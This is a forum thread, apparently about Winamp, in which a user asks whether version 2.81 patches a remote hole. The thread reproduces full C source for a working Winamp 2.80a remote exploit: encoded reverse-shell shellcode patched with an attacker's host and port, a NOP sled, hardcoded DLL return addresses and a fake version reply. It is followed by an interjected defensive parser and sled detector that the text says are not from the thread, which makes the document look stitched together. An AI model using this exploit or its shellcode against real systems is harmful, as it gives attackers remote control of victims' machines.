XPLoiTS
I've heard about the bug in Nullsoft's Winamp's id3 Tag & about the way to xploit it remotely (which is quite simple, I must say) & also heard about another xploit (which I've not yet tested) that would allow any malicious a**hole access to my hard disk and so my files, only knowing my Internet Port Address and whether I'm using Winamp 2.81 or earlier versions. In the demonstrative picture that appeared on the web page (to which I won't give out free publicity) was the command.com prompt of Windoze 98 on supposedly the attacker's PC (running Linux MDK 9), such as we see it on ours. This preoccupies me 'cuz it's extremely simple to gain full access whether the machine is protected or not 'cuz people like me WOULD leave CDDB and OF COURSE Minibrowser ports open on their firewalls, so Winamp can connect. So my question is: does the newer version of Winamp 2.81 (the one that fixes the id3 tag bug) fix the bug that I've just described??? If so, please reply. If it doesn't, please reply. If you've never heard about this exploit, please reply, and if you just want to tell me what a f*cker I am, please reply :D
P.D.: Here is the source code of the xploit:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/errno.h>
#include <unistd.h>

// a minimal HTTP header and fake version
unsigned char payload[35904] = "\x4f\x4b\x0d\x0a\x0d\x0a\x39\x2e\x39\x39\x0d\x0a\x0d\x0a";

// a gruesome hack of dark spyrits jill.c shell that further alters the
// startupinfo structure (as this isn't a service) and calls ExitThread
// to keep things invisible..
unsigned char shell[] =
"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\x16\x53\x84"
"\x6a\x73\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d\x95\x94"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc3\x98\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\xc4\x2b\x02\x75\x66\xc7\x47\x4c\x01\x81\x50\x8d\x47\x20"
"\x50\x83\xee\x11\x05\x11\x11\x11\x01\x2d\x7a\x12\x11\x01\xff\xe0";

main(char argc, char **argv){
  int i;
  unsigned short int a_port;
  unsigned long a_host;
  struct hostent *ht;
  struct sockaddr_in sin;

  if (argc < 3){
    printf("Winamp 2.80a remote exploit (7/3/2002)\n");
    printf("c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com\n\n");
    printf("usage: %s <localhost> <localport>\n\n", argv[0]);
    printf("NOTE: target os is 2000.. probably works on all\n");
    printf("winamp versions prior to 2.80a as there are no \n");
    printf("dependancies on winamp, only the static ws2help\n\n");
    exit(-1);
  }

  // blatantly ripped! *TEEHEEEHHEH*
  a_port = htons(atoi(argv[2]));
  a_port ^= 0x9595;
  if ((ht = gethostbyname(argv[1])) == 0){herror(argv[1]);exit(-1);}
  a_host = *((unsigned long *)ht->h_addr);
  a_host ^= 0x95959595;
  shell[385] = ((a_port) & 0xff);
  shell[386] = ((a_port >> 8) & 0xff);
  shell[390] = ((a_host) & 0xff);
  shell[391] = ((a_host >> 8) & 0xff);
  shell[392] = ((a_host >> 16) & 0xff);
  shell[393] = ((a_host >> 24) & 0xff);
  strcat(payload, shell);

  // lots of NOPs
  for(i=792;i<9704;i++) strcat(payload, "\x90");

  // we land here when we jmp ebx the second time
  // this sets ebx to the start of our shell, and jmps back
  strcat(payload, "\x81\xc3\x11\x11\x11\x01\x81\xeb\x07\x37");
  strcat(payload, "\x11\x01\xff\xe3");

  // lots more NOPs for lots more fun
  for(i=9718;i<35809;i++) strcat(payload, "\x90");

  // and bh, dl; jmp ebx.. this allows us to jmp back into an area
  // where we can put some real code
  strcat(payload, "\x22\xfa\xff\xe3");

  // our "eip" (call ecx; ntdll.dll@0x11936)
  // jmp ebx; ws2help.dll@0xdd6 (v5.0.2134.1, static on all service packs)
  strcat(payload, "\xd6\x19\x02\x75");

  // if ws2help doesn't match for some reason, use this call ebx..
  // dependant on the winamp in_wm.dll plugin
  //strcat(payload, "\x57\x22\x12\x01");

  strcat(payload, "\x0d\x0a");
  printf("%s", payload);
}
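The first 14 bytes of payload[] in the post decode to "OK\r\n\r\n9.99\r\n\r\n", a status line plus a fake version number; everything appended after that is the roughly 35 KB of NOPs and code that overruns the client. As an added example, not code from this thread or from Nullsoft, here is how a client could handle such a reply defensively in C: a parser that bounds the version token before copying a single byte of it, and a separate trailer check a defender can use to flag a reply that carries a large body or a long run of one byte value after the terminator. MAX_VERSION_LEN, the function names and the sample reply are all constructed for this example and are not taken from Winamp.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stddef.h>

/* Longest version token accepted ("2.81", "9.99", ...). Chosen for this
 * example, not a Winamp constant. */
#define MAX_VERSION_LEN 15

enum reply_status {
    REPLY_OK = 0,       /* "OK\r\n\r\n<digits and dots>\r\n\r\n" */
    REPLY_BAD_STATUS,   /* reply did not start with "OK\r\n\r\n" */
    REPLY_TOO_LONG,     /* token longer than MAX_VERSION_LEN or than out */
    REPLY_BAD_CHARS,    /* token empty or not made of digits and dots */
    REPLY_TRUNCATED     /* no CR terminating the token */
};

/* Copy the version token into out (capacity out_len) only after its
 * length has been bounded; the scan itself stops at MAX_VERSION_LEN, so a
 * 35 KB body after the headers is never read, let alone copied. */
enum reply_status parse_version_reply(const unsigned char *buf, size_t len,
                                      char *out, size_t out_len)
{
    static const char status[] = "OK\r\n\r\n";
    const size_t slen = sizeof(status) - 1;
    size_t i, vlen;

    if (len < slen || memcmp(buf, status, slen) != 0)
        return REPLY_BAD_STATUS;
    for (i = slen; i < len && buf[i] != '\r'; i++) {
        if (i - slen >= MAX_VERSION_LEN)
            return REPLY_TOO_LONG;
        if (!isdigit(buf[i]) && buf[i] != '.')
            return REPLY_BAD_CHARS;
    }
    if (i >= len)
        return REPLY_TRUNCATED;
    vlen = i - slen;
    if (vlen == 0)
        return REPLY_BAD_CHARS;
    if (vlen + 1 > out_len)
        return REPLY_TOO_LONG;      /* the caller's buffer is the hard limit */
    memcpy(out, buf + slen, vlen);
    out[vlen] = '\0';
    return REPLY_OK;
}

/* Offset just past the second "\r\n\r\n", i.e. where any trailing data
 * begins; returns len when the reply ends cleanly. */
static size_t body_offset(const unsigned char *buf, size_t len)
{
    size_t i, hits = 0;
    for (i = 0; i + 4 <= len; i++) {
        if (memcmp(buf + i, "\r\n\r\n", 4) == 0 && ++hits == 2)
            return i + 4;
    }
    return len;
}

/* Detection heuristic: a version reply should carry nothing after its
 * terminator. Flags a reply whose trailer exceeds max_trailing bytes or
 * contains run_limit consecutive copies of one byte (the NOP-sled shape of
 * the posted payload). Returns 1 if suspicious, 0 otherwise. */
int reply_has_suspicious_trailer(const unsigned char *buf, size_t len,
                                 size_t max_trailing, size_t run_limit)
{
    size_t body = body_offset(buf, len), i, run = 1;
    if (body >= len)
        return 0;
    if (len - body > max_trailing)
        return 1;
    for (i = body + 1; i < len; i++) {
        run = (buf[i] == buf[i - 1]) ? run + 1 : 1;
        if (run >= run_limit)
            return 1;
    }
    return 0;
}

/* Constructed sample: a well-formed reply followed by 256 NOP bytes and no
 * real code. Returns bytes written, or 0 if cap is too small. */
size_t build_sled_sample(unsigned char *dst, size_t cap)
{
    static const char head[] = "OK\r\n\r\n9.99\r\n\r\n";
    const size_t hlen = sizeof(head) - 1, sled = 256;
    if (cap < hlen + sled)
        return 0;
    memcpy(dst, head, hlen);
    memset(dst + hlen, 0x90, sled);
    return hlen + sled;
}

int main(void)
{
    unsigned char sample[512];
    char version[MAX_VERSION_LEN + 1];
    size_t n = build_sled_sample(sample, sizeof sample);
    enum reply_status st = parse_version_reply(sample, n, version, sizeof version);
    printf("parse: %d (version \"%s\"), suspicious trailer: %d\n", (int)st,
           st == REPLY_OK ? version : "", reply_has_suspicious_trailer(sample, n, 64, 32));
    return 0;
}
```

Run against the constructed sample, the parser still reports a clean "9.99" (the token itself is harmless) while the trailer check fires on the 256-byte sled; the two checks are deliberately separate so that bounding the copy does not depend on recognising the attack pattern.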
And people say us trekkers are sad
|
i believe that won't work in the new versions of winamp. i don't do a lot of C coding though, so i can't really analyse it. i assume it's a pretty basic "running arbitrary code" hack though.
|
i love exploit code. it's uber-l33t.
|
I have no clue what this is, or what it does, but as long as it doesn't do it anymore, I think that I am happy....
|
ze question: why escape everything?
|
good point :winamp:
|
Copyright © 1999 - 2010 Nullsoft. All Rights Reserved.